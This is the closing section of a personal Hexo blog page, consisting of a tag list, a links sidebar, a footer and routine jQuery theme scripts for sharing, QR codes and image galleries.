				<li><a href="/tags/待完善/" title="待完善">待完善<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/canary/" title="canary">canary<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">Links</p>
    <ul>
        
          <li>
            
            	<a href="https://whali3n51.github.io" target="_blank" title="whali3n51">whali3n51</a>
            
          </li>
        
    </ul>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	

	<p class="copyright">
	Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/hsihohuang/kiddochan" target="_blank" title="Kiddochan">Kiddochan</a> © 2024 
	
	<a href="/about" target="_blank" title="p1Kk">p1Kk</a>
	
	
	</p>
</div></footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
